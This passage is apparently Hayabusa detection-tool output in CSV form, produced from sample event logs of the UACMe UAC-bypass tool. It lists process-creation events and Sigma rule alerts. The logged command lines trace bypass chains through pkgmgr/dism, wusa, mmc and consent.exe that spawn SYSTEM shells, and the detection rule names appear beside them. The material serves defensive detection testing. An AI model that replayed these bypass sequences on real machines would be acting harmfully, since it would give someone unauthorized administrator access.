32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:48.696 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064425400 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:49.371 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: 
C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 30 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:15.579 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064427C00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:17.433 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\wusa.exe"" : Path: C:\Windows\SysWOW64\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 30",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:17.541 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 294 0000028064427C00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:18.619 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\wusa.exe"" : Path: C:\Windows\SysWOW64\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 30",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:18.694 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6312 -ip 6312",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:18.715 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 80 : Path: C:\Windows\SysWOW64\WerFault.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\syswow64\wusa.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:18.824 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4348 -ip 4348",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 23 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool 
UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:53.943 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:54.900 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml : Path: C:\Windows\System32\PkgMgr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 23",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:54.972 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 406 000002806444C740 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:55.455 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml : Path: C:\Windows\System32\PkgMgr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 23",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml"" : Path: 
C:\Windows\System32\Dism.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using PkgMgr and DISM,,rules/sigma/process_creation/win_uac_bypass_pkgmgr_dism.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:55.820 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 22 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:13.874 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC3D0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:14.372 
+09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC9C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:14.977 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC890 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:15.664 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC170 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:16.721 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 22",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:16.753 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064471300 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:16.853 
+09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 4740 -s 128 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 318 0000028064471300,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Consent and Comctl32 - Process,,rules/sigma/process_creation/win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:19.915 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 318 0000028064471300",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:20.731 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 22",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:21.128 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC500 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 7564 -s 152 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 
896 272 00000280644BC500,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Consent and Comctl32 - Process,,rules/sigma/process_creation/win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:23.554 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 272 00000280644BC500",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:23.555 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:55.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 37 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:15.354 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 37",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:15.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 400 00000280644220C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 37",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using NTFS Reparse Point - Process,,rules/sigma/process_creation/win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:27.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC040 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:32:34.577 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 36 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:35.085 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:35.137 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 400 00000280644220C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using NTFS Reparse Point - 
Process,,rules/sigma/process_creation/win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:36.794 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dcomcnfg.exe"" : Path: C:\Windows\System32\dcomcnfg.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:36.812 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064471E00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:37.160 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dcomcnfg.exe"" : Path: C:\Windows\System32\dcomcnfg.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:37.184 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\mmc.exe C:\Windows\system32\comexp.msc : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\dcomcnfg.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:37.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p 
-s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:49.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC3D0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 38 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:27.060 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 398 000002806443AF40 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:27.356 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc"" : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 38",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:29.424 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" : Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe : User: MSEDGEWIN10\IEUser : Parent Command: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:29.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 39 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,high,UAC Bypass Using .NET Code Profiler on MMC,,rules/sigma/file_event/sysmon_uac_bypass_dotnet_profiler.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:06.730 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc : Path: 
C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 39",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:06.796 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 376 0000028064463A00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:07.144 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 39",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: 